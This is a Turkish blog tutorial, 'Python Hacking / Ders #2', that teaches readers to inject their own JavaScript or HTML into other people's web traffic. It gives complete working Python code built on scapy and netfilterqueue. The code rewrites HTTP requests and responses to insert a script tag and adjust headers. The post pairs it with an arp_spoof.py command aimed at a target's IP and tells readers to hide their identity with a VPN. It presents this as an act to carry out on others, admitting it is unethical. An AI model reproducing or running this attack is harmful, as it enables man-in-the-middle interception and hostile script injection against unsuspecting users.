Python Hacking / Ders #2

Yazılım Kampı

Python Hacking / Ders #2

Merhaba Sevgili Arkadaşlar,

Bugün Sizlerle Kaldığımız Yerden Devam Edeceğiz.

Bugünkü Konu:

Python ile Bir Websitesinin İçine Kendi (Html, Css, Javascript) Kodunuz Enjekte Etmek.

Bu işlem Etik Değildir Bu Nedenle mossarb.net Yaptığınız İşlemlerden Sorumlu Değildir.

---

Not: Büyük Web Sitelere Yapmanız Tavsiye Edilmez Aksi Takdirde Başınıza Bela Alabilirsiniz.

---

Bunu Yapmadan Önce Kimliğimizi Gizlemek için bir VPN ve Kali Linux Kullanmak Kesin Olarak Gerekiyor.

İnternet Üzerinden bir Vpn ve Kali Linux Kurunuz.

VPN = https://www.vpnbook.com/

Kali Linux = https://www.kali.org/

---

İlk Olarak Kali Linux Sanal Makinesinin İçine Giriyoruz Daha Sonra Terminali Açıyoruz ve Oraya Şu Kodu Kopyalıyoruz;

$ pip install scapy==2.4.5 netfilterqueue colorama

Bu işlemi yaptıktan sonra Kurulmasını Bekliyoruz, Bittikten Sonra ise

Tekrar Terminale, pip install colorama yazıyoruz ve kurulmasını bekliyoruz buda bittikten sonra Son olarak Terminale, pip install scapy yazıyoruz ve kurulduktan sonra Terminali Kapatıyoruz.

---

Şimdi ise Python Kodu Yazmamızı Sağlayacak Programa Geliyoruz Ve Bir Python (.py) Dosyası Oluşturuyoruz.

Ve içine şu kodları yazıyoruz:

from scapy.all import *
from colorama import init, Fore
import netfilterqueue
import re

Bunlar Projemizde Kullanılacak Python Kütüphaneleri.

Devamında,

init()


GREEN = Fore.GREEN
RESET = Fore.RESET

Burada ise Renkleri Seçtik.

Sonrasında,

def process_packet(packet):
    """
    This function is executed whenever a packet is sniffed
    """
   
    spacket = IP(packet.get_payload())
    if spacket.haslayer(Raw) and spacket.haslayer(TCP):
        if spacket[TCP].dport == 80:
           
            print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}")
            try:
                load = spacket[Raw].load.decode()
            except Exception as e:
                
                packet.accept()
                return
            
            new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load)
           
            spacket[Raw].load = new_load
           
            spacket[IP].len = None
            spacket[IP].chksum = None
            spacket[TCP].chksum = None
            
            packet.set_payload(bytes(spacket))

Burada NetfilterQueue Bağlanmak için paketi parametre olarak kabul eden bir fonksiyon yazmamız gerekiyor.

Devamı,

if spacket[TCP].sport == 80:
            # HTTP
            print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}")
            try:
                load = spacket[Raw].load.decode()
            except:
                packet.accept()
                return
           
            # print("Load:", load)
                        added_text = "<script>alert('Javascript Injected successfully!');</script>"
            
            # added_text = "<p><b>HTML Injected successfully!</b></p>"
           
            added_text_length = len(added_text)
            
            load = load.replace("</body>", added_text + "</body>")
            if "Content-Length" in load:
                
                
                content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1))
                
                new_content_length = content_length + added_text_length
               
                load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load)
               
                if added_text in load:
                    print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}")
          
            spacket[Raw].load = load
           
            spacket[IP].len = None
            spacket[IP].chksum = None
            spacket[TCP].chksum = None
           
            packet.set_payload(bytes(spacket))
   
    packet.accept()

Burada HTTP Yanıtlarını Algılama Fonksiyonun Devamını Yaptık.

if __name__ == "__main__":
   
    queue = netfilterqueue.NetfilterQueue()
    
    queue.bind(0, process_packet)
   
    queue.run()

Artık Çalıştırabiliriz.

---

Eğer Karşı Kişinin IP Adresine Sahipseniz Aşağıdaki Kod ile karşı kişinin makinesinde çalıştırabilirsiniz.

$ python3 arp_spoof.py 192.111.11.1 192.222.22.2

Not: Kesinlikle Linux İşletim Sistemi Gerekiyor Aksi Takdirde Program Çalışmaz.

---

HTTP Paketlerine Kod Enjekte Etme,

$ python http_code_injector.py

Tam Kod:

from scapy.all import *
from colorama import init, Fore
import netfilterqueue
import re

# initialize colorama
init()

# define colors
GREEN = Fore.GREEN
RESET = Fore.RESET


def process_packet(packet):
    """
    This function is executed whenever a packet is sniffed
    """
    # convert the netfilterqueue packet into Scapy packet
    spacket = IP(packet.get_payload())
    if spacket.haslayer(Raw) and spacket.haslayer(TCP):
        if spacket[TCP].dport == 80:
            # HTTP request
            print(f"[*] Detected HTTP Request from {spacket[IP].src} to {spacket[IP].dst}")
            try:
                load = spacket[Raw].load.decode()
            except Exception as e:
                # raw data cannot be decoded, apparently not HTML
                # forward the packet exit the function
                packet.accept()
                return
            # remove Accept-Encoding header from the HTTP request
            new_load = re.sub(r"Accept-Encoding:.*\r\n", "", load)
            # set the new data
            spacket[Raw].load = new_load
            # set IP length header, checksums of IP and TCP to None
            # so Scapy will re-calculate them automatically
            spacket[IP].len = None
            spacket[IP].chksum = None
            spacket[TCP].chksum = None
            # set the modified Scapy packet back to the netfilterqueue packet
            packet.set_payload(bytes(spacket))
        if spacket[TCP].sport == 80:
            # HTTP response
            print(f"[*] Detected HTTP Response from {spacket[IP].src} to {spacket[IP].dst}")
            try:
                load = spacket[Raw].load.decode()
            except:
                packet.accept()
                return
            # if you want to debug and see the HTML data
            # print("Load:", load)
            # Javascript code to add, feel free to add any Javascript code
            added_text = "<script>alert('Javascript Injected successfully!');</script>"
            # or you can add HTML as well!
            # added_text = "<p><b>HTML Injected successfully!</b></p>"
            # calculate the length in bytes, each character corresponds to a byte
            added_text_length = len(added_text)
            # replace the </body> tag with the added text plus </body>
            load = load.replace("</body>", added_text + "</body>")
            if "Content-Length" in load:
                # if Content-Length header is available
                # get the old Content-Length value
                content_length = int(re.search(r"Content-Length: (\d+)\r\n", load).group(1))
                # re-calculate the content length by adding the length of the injected code
                new_content_length = content_length + added_text_length
                # replace the new content length to the header
                load = re.sub(r"Content-Length:.*\r\n", f"Content-Length: {new_content_length}\r\n", load)
                # print a message if injected
                if added_text in load:
                    print(f"{GREEN}[+] Successfully injected code to {spacket[IP].dst}{RESET}")
            # if you want to debug and see the modified HTML data
            # print("Load:", load)
            # set the new data
            spacket[Raw].load = load
            # set IP length header, checksums of IP and TCP to None
            # so Scapy will re-calculate them automatically
            spacket[IP].len = None
            spacket[IP].chksum = None
            spacket[TCP].chksum = None
            # set the modified Scapy packet back to the netfilterqueue packet
            packet.set_payload(bytes(spacket))
    # accept all the packets
    packet.accept()


if __name__ == "__main__":
    # initialize the queue
    queue = netfilterqueue.NetfilterQueue()
    # bind the queue number 0 to the process_packet() function
    queue.bind(0, process_packet)
    # start the filter queue
    queue.run()

Çalıştırma:

İlk Olarak Hedef Kişinin IP Adresini Bulun Eğer Nasıl Bulacağınızı Bilmiyorsanız Bu Yazımızı Okuyun.(www)

Daha Sonra Yukarıdaki Kodları Python Dosyanıza Yazın ve Şu Kodu Terminalde Çalşıtırın,

$ python3 arp_spoof.py BULDUĞUNUZ IP BURAYA GELECEK

Burası da Bittikten Sonra,

Terminalde Böyle Bir Görüntü Alacaksınız Daha Sonra Hedef Kişinin Web Sitesine Gidin ve Enjekte Ettiğiniz Kod Çalışacaktır.

Bir Sonraki Derslerde Görüşmek Üzere...

---

Takipte Kalın

---

Kaynak:

https://www.thepythoncode.com/

Facebook

Python Hacking / Ders #2 - Mossarb

Yorum Gönder

0 Yorumlar

İletişim

Abone Ol

Facebook

Abone Ol

Popüler

Python ile Yüzlerce Mesaj Kopyalamak - Mossarb

Dünya'dan ve Yurttan İlginç Bilgiler - Mossarb

İletişim - Mossarb

Yeni Yayınlar

Dünya'dan ve Yurttan İlginç Bilgiler - Mossarb

Yeni Köpek Alacağım, Ne Almalıyım ? - Mossarb

Python ile Yüzlerce Mesaj Kopyalamak - Mossarb

Facebook

Python Hacking / Ders #2 - Mossarb

Yorum Gönder

0 Yorumlar

İletişim

Abone Ol

Sosyal Medya

Facebook

Abone Ol

Popüler

Python ile Yüzlerce Mesaj Kopyalamak - Mossarb

Dünya'dan ve Yurttan İlginç Bilgiler - Mossarb

İletişim - Mossarb

Yeni Yayınlar

Dünya'dan ve Yurttan İlginç Bilgiler - Mossarb

Yeni Köpek Alacağım, Ne Almalıyım ? - Mossarb

Python ile Yüzlerce Mesaj Kopyalamak - Mossarb